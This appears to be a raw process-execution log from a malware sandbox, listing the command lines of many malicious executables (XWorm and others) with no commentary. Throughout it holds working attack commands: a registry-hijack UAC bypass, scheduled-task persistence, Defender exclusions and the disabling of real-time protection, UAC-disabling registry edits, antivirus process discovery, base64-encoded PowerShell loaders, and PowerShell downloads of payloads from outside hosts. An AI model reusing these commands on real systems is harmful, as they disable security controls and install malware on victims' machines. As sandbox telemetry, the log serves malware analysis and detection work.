/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4284.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4284.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\4284.vbs

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\4284.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RW4i2n0v4jZt.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nZRwf4i3gbqv.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3ufjDrYsMBh2.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qJmll3zvJ2Zb.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\stail.exe

"C:\Users\Admin\Desktop\Files\stail.exe"

C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp" /SL5="$60576,3881966,54272,C:\Users\Admin\Desktop\Files\stail.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause lerry_video_11261

C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe

"C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause lerry_video_11261

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pqGYxp582ui4.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp283A.tmp"

C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe

"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"

C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe

"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"

C:\Users\Admin\Desktop\Files\windowsexecutable.exe

"C:\Users\Admin\Desktop\Files\windowsexecutable.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WRW3jUfKERoW.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6vc0q3VbwkxW.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\Client_protected.exe

"C:\Users\Admin\Desktop\Files\Client_protected.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PdwGGa0lF9fa.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3084 -ip 3084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 1408

C:\Users\Admin\Desktop\a\filer.exe

"C:\Users\Admin\Desktop\a\filer.exe"

C:\Users\Admin\Desktop\a\AmLzNi.exe

"C:\Users\Admin\Desktop\a\AmLzNi.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Desktop\a\filer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1SiI4Zkx6p69.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\Wbem\wmic.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\System32\Wbem\wmic.exe

wmic path win32_VideoController get name

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\Desktop\Files\xxz.exe

"C:\Users\Admin\Desktop\Files\xxz.exe"

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\screenshot_0.png"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\screenshot_0.png"

C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe

"C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe"

C:\Users\Admin\Desktop\a\XClient.exe

"C:\Users\Admin\Desktop\a\XClient.exe"

C:\Users\Admin\Desktop\a\333.exe

"C:\Users\Admin\Desktop\a\333.exe"

C:\Users\Admin\Desktop\a\VBVEd6f.exe

"C:\Users\Admin\Desktop\a\VBVEd6f.exe"

C:\Users\Admin\Desktop\a\test12.exe

"C:\Users\Admin\Desktop\a\test12.exe"

C:\Users\Admin\Desktop\a\test6.exe

"C:\Users\Admin\Desktop\a\test6.exe"

C:\Users\Admin\Desktop\a\test14.exe

"C:\Users\Admin\Desktop\a\test14.exe"

C:\Users\Admin\Desktop\Files\taskhost.exe

"C:\Users\Admin\Desktop\Files\taskhost.exe"

C:\Users\Admin\Desktop\a\pantest.exe

"C:\Users\Admin\Desktop\a\pantest.exe"

C:\Users\Admin\Desktop\a\test9.exe

"C:\Users\Admin\Desktop\a\test9.exe"

C:\Users\Admin\Desktop\a\test10-29.exe

"C:\Users\Admin\Desktop\a\test10-29.exe"

C:\Users\Admin\Desktop\a\test19.exe

"C:\Users\Admin\Desktop\a\test19.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\taskhost.exe'

C:\Users\Admin\Desktop\a\test10.exe

"C:\Users\Admin\Desktop\a\test10.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'

C:\Users\Admin\Desktop\a\test_again4.exe

"C:\Users\Admin\Desktop\a\test_again4.exe"

C:\Users\Admin\Desktop\a\test23.exe

"C:\Users\Admin\Desktop\a\test23.exe"

C:\Users\Admin\Desktop\a\test5.exe

"C:\Users\Admin\Desktop\a\test5.exe"

C:\Users\Admin\Desktop\a\test11.exe

"C:\Users\Admin\Desktop\a\test11.exe"

C:\Users\Admin\Desktop\a\test20.exe

"C:\Users\Admin\Desktop\a\test20.exe"

C:\Users\Admin\Desktop\a\test_again3.exe

"C:\Users\Admin\Desktop\a\test_again3.exe"

C:\Users\Admin\Desktop\a\test16.exe

"C:\Users\Admin\Desktop\a\test16.exe"

C:\Users\Admin\Desktop\a\test13.exe

"C:\Users\Admin\Desktop\a\test13.exe"

C:\Users\Admin\Desktop\a\test_again2.exe

"C:\Users\Admin\Desktop\a\test_again2.exe"

C:\Users\Admin\Desktop\a\test15.exe

"C:\Users\Admin\Desktop\a\test15.exe"

C:\Users\Admin\Desktop\a\test18.exe

"C:\Users\Admin\Desktop\a\test18.exe"

C:\Users\Admin\Desktop\a\test21.exe

"C:\Users\Admin\Desktop\a\test21.exe"

C:\Users\Admin\Desktop\a\test22.exe

"C:\Users\Admin\Desktop\a\test22.exe"

C:\Users\Admin\Desktop\a\test8.exe

"C:\Users\Admin\Desktop\a\test8.exe"

C:\Users\Admin\Desktop\a\test7.exe

"C:\Users\Admin\Desktop\a\test7.exe"

C:\Users\Admin\Desktop\a\test-again.exe

"C:\Users\Admin\Desktop\a\test-again.exe"

C:\Users\Admin\Desktop\a\test17.exe

"C:\Users\Admin\Desktop\a\test17.exe"

C:\Users\Admin\Desktop\a\vg9qcBa.exe

"C:\Users\Admin\Desktop\a\vg9qcBa.exe"

C:\Users\Admin\Desktop\a\vg9qcBa.exe

"C:\Users\Admin\Desktop\a\vg9qcBa.exe"

C:\Users\Admin\Desktop\a\vg9qcBa.exe

"C:\Users\Admin\Desktop\a\vg9qcBa.exe"

C:\Users\Admin\Desktop\a\vg9qcBa.exe

"C:\Users\Admin\Desktop\a\vg9qcBa.exe"

C:\Users\Admin\Desktop\Files\LoadNew.exe

"C:\Users\Admin\Desktop\Files\LoadNew.exe"

C:\Users\Admin\Desktop\Files\OneDrive.exe

"C:\Users\Admin\Desktop\Files\OneDrive.exe"

C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe

"C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Users\Admin\Desktop\Files\25072023.exe

"C:\Users\Admin\Desktop\Files\25072023.exe"

C:\Users\Admin\Desktop\Files\PctOccurred.exe

"C:\Users\Admin\Desktop\Files\PctOccurred.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit

C:\Users\Admin\Desktop\Files\crypted8888.exe

"C:\Users\Admin\Desktop\Files\crypted8888.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\win.exe

"C:\Users\Admin\Desktop\a\win.exe"

C:\Windows\SysWOW64\route.exe

route print

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\arp.exe

arp -a 10.127.0.1

C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe

"C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit

C:\Users\Admin\Desktop\a\x4lburt.exe

"C:\Users\Admin\Desktop\a\x4lburt.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c md 193997

C:\Windows\SysWOW64\findstr.exe

findstr /V "JulieAppMagneticWhenever" Hist

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y

C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif

Restructuring.pif y

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 447331

C:\Windows\SysWOW64\findstr.exe

findstr /V "typesfaxincreasecompound" Ensemble

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p

C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif

Buyer.pif p

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAZABvAGMAdQBtAGUAbgB0AHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA=

C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif

C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif" & rd /s /q "C:\ProgramData\AAKJEGCFBGDH" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Desktop\Files\postbox.exe

"C:\Users\Admin\Desktop\Files\postbox.exe"

C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe

"C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe"

C:\Users\Admin\AppData\Local\Temp\iazsfn.exe

"C:\Users\Admin\AppData\Local\Temp\iazsfn.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs"

C:\Users\Admin\AppData\Local\Temp\OneDrive.exe

"C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"

C:\Windows\system32\cmd.exe

cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" /Y

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe

"C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" -enc JABLAHgAcAByAGsAdABqAG8AbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABOAHkAdgBoAHkAeAB2AGsAaQAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEsAeABwAHIAawB0AGoAbwBvACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEwAZQBwAGsAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABOAHkAdgBoAHkAeAB2AGsAaQAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQARABmAGEAdwBuAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEwAZQBwAGsAbAAgACkAOwAkAEMAYwB5AGMAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABEAGYAYQB3AG4AbwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAuAEMAbwBwAHkAVABvACgAIAAkAEMAYwB5AGMAaQAgACkAOwAkAE4AbABhAHMAegBhAHEAaABkAHEALgBDAGwAbwBzAGUAKAApADsAJABEAGYAYQB3AG4AbwAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEwAZQBwAGsAbAAgAD0AIAAkAEMAYwB5AGMAaQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATABlAHAAawBsACkAOwAgACQARABqAGkAaABjAGMAaABtAHoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABMAGUAcABrAGwAKQA7ACAAJABKAG4AegBhAHgAagAgAD0AIAAkAEQAagBpAGgAYwBjAGgAbQB6AC4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7ACAAWwBTAHkAcwB0AGUAbQAuAEQAZQBsAGUAZwBhAHQAZQBdADoAOgBDAHIAZQBhAHQAZQBEAGUAbABlAGcAYQB0AGUAKABbAEEAYwB0AGkAbwBuAF0ALAAgACQASgBuAHoAYQB4AGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEoAbgB6AGEAeABqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Users\Admin\Desktop\Files\pp.exe

"C:\Users\Admin\Desktop\Files\pp.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe

"C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe"

C:\Users\Admin\Desktop\Files\av_downloader1.1.exe

"C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F99A.tmp\F9AB.tmp\F9AC.bat C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE

"C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FCC6.tmp\FCC7.tmp\FCC8.bat C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb3b3046f8,0x7ffb3b304708,0x7ffb3b304718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

